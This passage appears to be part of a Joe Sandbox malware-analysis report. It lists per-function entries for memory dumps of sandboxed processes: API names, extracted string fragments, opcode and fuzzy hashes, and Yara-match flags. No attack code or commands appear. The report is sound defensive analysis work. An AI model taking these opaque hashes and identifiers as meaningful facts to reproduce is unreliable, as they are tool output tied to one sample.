                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                        • API String ID: 3446177414-3526935505
                        • Opcode ID: 763178d8bd66b190589465fe420437b1438e3fb29ace53886f6738b74e151214
                        • Instruction ID: e56be691ff18dd2f2fe3f2dc2a50b3fcda3972b6b69bfdea16258af67c725390
                        • Opcode Fuzzy Hash: 763178d8bd66b190589465fe420437b1438e3fb29ace53886f6738b74e151214
                        • Instruction Fuzzy Hash: AB31E030105784DFE73BDBACCC49BA67BE9FF41B50F054189E4468BB92CBA8A881C751
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: $
                        • API String ID: 3446177414-3993045852
                        • Opcode ID: a3ae36cdc7558d4444d3a45b5728be1fe3c993211343d5ff5f185e50e1751410
                        • Instruction ID: 7d62a38444a33568134081d2d375a6f325c8688b7b2a7429f9400d783dbaa30c
                        • Opcode Fuzzy Hash: a3ae36cdc7558d4444d3a45b5728be1fe3c993211343d5ff5f185e50e1751410
                        • Instruction Fuzzy Hash: 11116132905219EBCF16AFA4EC486DC7B72FF85365F108119F9266B2D0CB315A50DF44
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3eed3d33aee35fc30f259d36136c444d779d137db0d9aea3804d70d642dce6e5
                        • Instruction ID: f97a60cbd7d80cd17c747048999c57ec2532b335df103e43e2a3ea28e696e7fc
                        • Opcode Fuzzy Hash: 3eed3d33aee35fc30f259d36136c444d779d137db0d9aea3804d70d642dce6e5
                        • Instruction Fuzzy Hash: FDE1F270D00608DFCB2ACFA9C984A9EBBF1FF48315F1445AAE956A73A1D771A841CF50
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID:
                        • API String ID: 3446177414-0
                        • Opcode ID: 552fc9bc226390322e47fd2556166f110505f97d02bb5b54e4571a0d7bc62a3a
                        • Instruction ID: b0de1a69e5dff4c918f34d8b587778fd7d65a817e1247a611598175cda7d7e17
                        • Opcode Fuzzy Hash: 552fc9bc226390322e47fd2556166f110505f97d02bb5b54e4571a0d7bc62a3a
                        • Instruction Fuzzy Hash: 24716671E012199FDF91CFA8CD84ADDBBB5BF48315F0840AAE905EB350D734A905CBA4
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID:
                        • API String ID: 3446177414-0
                        • Opcode ID: d7a23a4294e40b0c37c7df852da3b7f859f37676bd06be9202ecd64baa3099ac
                        • Instruction ID: 8120f0c4963e498d03aebbf591274f192c42312893f492e0a5a99e88e41d546f
                        • Opcode Fuzzy Hash: d7a23a4294e40b0c37c7df852da3b7f859f37676bd06be9202ecd64baa3099ac
                        • Instruction Fuzzy Hash: 815133B2E012199FEF48CF99DC84ADDBBB1BF48355F1880AAE905AB250D7349901CF94
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes$BaseInitThreadThunk
                        • String ID:
                        • API String ID: 4281723722-0
                        • Opcode ID: 7e74817ae30cdd7389002fe086532157b5334cb33b9f0f2afc836396eeb748cf
                        • Instruction ID: 9719e165488a6a9fcaa28635ed07c78378bbcd0b9291337901f0e77cfd5348b1
                        • Opcode Fuzzy Hash: 7e74817ae30cdd7389002fe086532157b5334cb33b9f0f2afc836396eeb748cf
                        • Instruction Fuzzy Hash: E2312572E01229AFCF65DFA8EC84A9DBBF1BB48720F10416AE911B7394DB305940CF54
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 8ab0a5727c5bd61ed4167cc59238a5a57fc67598b07b40db829884f3a033e2d4
                        • Instruction ID: ea30baad83805cca84b095ec33144adde5b2e863ff3fd5e3e81ea6e310bdcdae
                        • Opcode Fuzzy Hash: 8ab0a5727c5bd61ed4167cc59238a5a57fc67598b07b40db829884f3a033e2d4
                        • Instruction Fuzzy Hash: 1E325B74D1026ADFDB29CF64C848BEDBBF0BB18308F0085E9D559AB241E7759A84CF91
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-
                        • API String ID: 1302938615-2137968064
                        • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                        • Instruction ID: 9591bdc3fd59376ccaabae84d226e5aeb8890c306417d7c80c4526755bed63db
                        • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                        • Instruction Fuzzy Hash: 5291D271E04A3A9BEB24CF6DCC81EBEBBA5AF64320F14451AE955A73C0D7349941CF21
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: Bl$l
                        • API String ID: 3446177414-208461968
                        • Opcode ID: 1abcaa4bc417bb050c28904f66338d95de6101e152cbb46171c766ed8f45f9f7
                        • Instruction ID: 2ce7dc8a35850804b79af7d5c186dc36e64b4799343dd8dd9b0ccde157a92ef0
                        • Opcode Fuzzy Hash: 1abcaa4bc417bb050c28904f66338d95de6101e152cbb46171c766ed8f45f9f7
                        • Instruction Fuzzy Hash: 05A1A431A013298BEB31DB98CC94BADB7B6BB45304F0540EDDA09AB241DB75AE85CF51
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 01625E34
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: ErrorHandling__start
                        • String ID: pow
                        • API String ID: 3213639722-2276729525
                        • Opcode ID: f2632f95a1de6367d583915d3e66c2880ff7d70f2ec34035de3eabb85ab2e527
                        • Instruction ID: a8495ec6d990e0ef4ace2d99433338960fbfcd2b6259feed8b41b615ab71a705
                        • Opcode Fuzzy Hash: f2632f95a1de6367d583915d3e66c2880ff7d70f2ec34035de3eabb85ab2e527
                        • Instruction Fuzzy Hash: 09517671908E2296E736B71CCD053FE3B94EB00740F20C818E4E78A399EB348895DF4A
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0$Flst
                        • API String ID: 0-758220159
                        • Opcode ID: 5f728011c06c12bcf9119572b7e1014e45a4d8b3e55874d7caa55cdb72941f39
                        • Instruction ID: ac15735f88d0e341445941f9e595df075614d1fc9eb92bd6d2b03f123ab2b893
                        • Opcode Fuzzy Hash: 5f728011c06c12bcf9119572b7e1014e45a4d8b3e55874d7caa55cdb72941f39
                        • Instruction Fuzzy Hash: 80519CB2E002158BCF26CF99DC84669FBF4FF44758F59802ED4099B355EB709985CB80
                        APIs
                        • RtlDebugPrintTimes.NTDLL ref: 0160D959
                          • Part of subcall function 015E4859: RtlDebugPrintTimes.NTDLL ref: 015E48F7
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: $$$
                        • API String ID: 3446177414-233714265
                        • Opcode ID: d54aa6b448dcc42bb7c663c992e736b9a46e890a881b1f6abf3c920c7e42cdb3
                        • Instruction ID: aa04a36ccd5bf7777a14bebe83e05db94fd30421ddcfbbc8007b93dd8035133d
                        • Opcode Fuzzy Hash: d54aa6b448dcc42bb7c663c992e736b9a46e890a881b1f6abf3c920c7e42cdb3
                        • Instruction Fuzzy Hash: 9F51DE72E002469FDB2ADFE8CC847AEBBB2BF44314F15525DC9056B2C1D770AA52CB90
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: $
                        • API String ID: 3446177414-3993045852
                        • Opcode ID: 4aa862a5196271d521e6ad8a78fa8c07fc92024ce2e545280de74be830a4393c
                        • Instruction ID: d7f97bad46ef28367247bbe8f22ef0eb95d3eb225a78aca98f3cbb033fd014df
                        • Opcode Fuzzy Hash: 4aa862a5196271d521e6ad8a78fa8c07fc92024ce2e545280de74be830a4393c
                        • Instruction Fuzzy Hash: E6418AB5A01209ABDB51DF99CD80AEEBBB6BF48B04F140199ED04AB341D7719911DBA0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2775600801.00000000015D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                        • Associated: 0000000D.00000002.2775600801.00000000015B0000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000015B7000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001630000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001636000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.0000000001672000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D3000.00000040.00001000.00020000.00000000.sdmp
                        • Associated: 0000000D.00000002.2775600801.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_15b0000_YybGLWQSx.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: 0$0
                        • API String ID: 3446177414-203156872
                        • Opcode ID: 5275806ca04f651f58e0956ac0449ed0644477e0fc7eadc9902cbff231b3f5ab
                        • Instruction ID: 6211ac86131617544089d027f2c14909511204c50bfb1bc5f4c8fa079af9f290
                        • Opcode Fuzzy Hash: 5275806ca04f651f58e0956ac0449ed0644477e0fc7eadc9902cbff231b3f5ab
                        • Instruction Fuzzy Hash: CB415BB1A087069FD321CF2CC884A1ABBE5FB89314F04496EF588DB341D771E905CB96
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "4$$$$4$*$*:$*G$*z$+$+$,K$-$0$3$4$8U$:-$A$B$C$E$H$J$Kh$Q$R$RU,$SL$Us$V$V$[$e[$k$m$n$p$w$w_$z$,$`$c$u
                        • API String ID: 0-811391167
                        • Opcode ID: 6f63bc9fd5b92450d303a8fbf987dfd0a4e261a9c8c50b60002a39f4b7b2dfa0
                        • Instruction ID: 842a46c0923aa9bb65e78b43842695b42e89a1f1fcafb0d667508d3f9311068c
                        • Opcode Fuzzy Hash: 6f63bc9fd5b92450d303a8fbf987dfd0a4e261a9c8c50b60002a39f4b7b2dfa0
                        • Instruction Fuzzy Hash: CB728DB0E05229CBEB24CF45CD98BEDBBB2BB45348F1482D9D50D6B281C7B55A89CF50
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 6$O$S$\$s
                        • API String ID: 0-3854637164
                        • Opcode ID: a6eb4fb8affc4e6510aa563a0c97470e4c66ee5679be549872e3326d6f2e7225
                        • Instruction ID: fe23dcaf0da7b712e4ee0eaf77f0ff82debe92f2a6c8815a57fdb4075962d850
                        • Opcode Fuzzy Hash: a6eb4fb8affc4e6510aa563a0c97470e4c66ee5679be549872e3326d6f2e7225
                        • Instruction Fuzzy Hash: D041B5B2D00218BBDB11EA94ED48FEAF3B9EF44355F444199EB09A7100E771AA548FE1
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: zL
                        • API String ID: 0-3949170232
                        • Opcode ID: 868d137dbf67a380431c1016d2584ac3d50750c1a37b4620374ba1dec24c8ef3
                        • Instruction ID: b9028676098ee5b50a26b62434f93de45b417296ad00b6fa349b80d1630daf35
                        • Opcode Fuzzy Hash: 868d137dbf67a380431c1016d2584ac3d50750c1a37b4620374ba1dec24c8ef3
                        • Instruction Fuzzy Hash: 1411FBB2D0121CAF9B40DFE9DD409EEBBF9EF48250F14456AE919E7200E7705A048FA1
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f1aa024bdf4c66b07b43305a8921d8b9ea161f69727c14eb89fc51451aae7c1
                        • Instruction ID: 46c67ef65f85cde5c410f6b2787da66f218023b1f7c4eda2f6bcaec41358a938
                        • Opcode Fuzzy Hash: 2f1aa024bdf4c66b07b43305a8921d8b9ea161f69727c14eb89fc51451aae7c1
                        • Instruction Fuzzy Hash: 854119B1D11218AFDB14CF99DC81AEFBBB9EF49750F14415AFA18A7240E7B09641CBA0
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 94a68c089e150b6b9d80349166053ec91d3c341e7f912fc8c0046cafab93dcc0
                        • Instruction ID: da89b8abd1082512b74fd6b2cd612e5f5737d60c3b7efb17341dbb9cd705222f
                        • Opcode Fuzzy Hash: 94a68c089e150b6b9d80349166053ec91d3c341e7f912fc8c0046cafab93dcc0
                        • Instruction Fuzzy Hash: 5621D5B5A04209ABDB14DF98DC81FABB7B9EF89300F104119FA19A7240D774A911CFA5
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 84abba341f974abd9d5b245fee970bf457cd13a8266a289abe015e0e65b83c7d
                        • Instruction ID: 2436a4acc1340bf2a060c9a03e9dfe5da48930a9fd225dcc87ba5a944282bb8e
                        • Opcode Fuzzy Hash: 84abba341f974abd9d5b245fee970bf457cd13a8266a289abe015e0e65b83c7d
                        • Instruction Fuzzy Hash: 931186B27802057BF720AA598C42FAB775DDF85B55F244015FB08AE2C1D6A5B8114AF4
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 58e6bf0c26bf550f00c75b79209cc84edf814af522356a322b2647e30c4852f5
                        • Instruction ID: e05618ea2cb5471e4e2e5578867f23e3d811b85d35aba98d25380b59a7448573
                        • Opcode Fuzzy Hash: 58e6bf0c26bf550f00c75b79209cc84edf814af522356a322b2647e30c4852f5
                        • Instruction Fuzzy Hash: E52118B5A00609ABDB14DF98DC81FABB7A9EF89710F10451DFA19A7240D770A911CFA1
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ccdf9ee8fe252e156632f20c56bd35016570fae0c10670d610c6e362f3781b9c
                        • Instruction ID: e75a254ecbe377ebe63bf4991c546f87f4314c87a8ac45541867b0f95f988b38
                        • Opcode Fuzzy Hash: ccdf9ee8fe252e156632f20c56bd35016570fae0c10670d610c6e362f3781b9c
                        • Instruction Fuzzy Hash: C0115171A407056BD720EEA8DC41FABB7ADEF85710F10461DFF19A7280D7706911CBA1
                        Memory Dump Source
                        • Source File: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2d40000_OoIHIwIlaOHZFTFWeSHYCjEJ.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2da8b0d9d7ceb3b8de3ca10837580c83203493f28c9e406a422b2d92a5ae5936
                        • Instruction ID: f6f3845f4dd4bd7a9d93822c59bc78f0aede290e285b0dbbd03cbbfe3cae2057
                        • Opcode Fuzzy Hash: 2da8b0d9d7ceb3b8de3ca10837580c83203493f28c9e406a422b2d92a5ae5936
                        • Instruction Fuzzy Hash: A011E2B6D11119AF8B40DFE9DD419EFB7F9EF88310F14416AE915E7200E7705A048FA0
                        Memory Dump Source
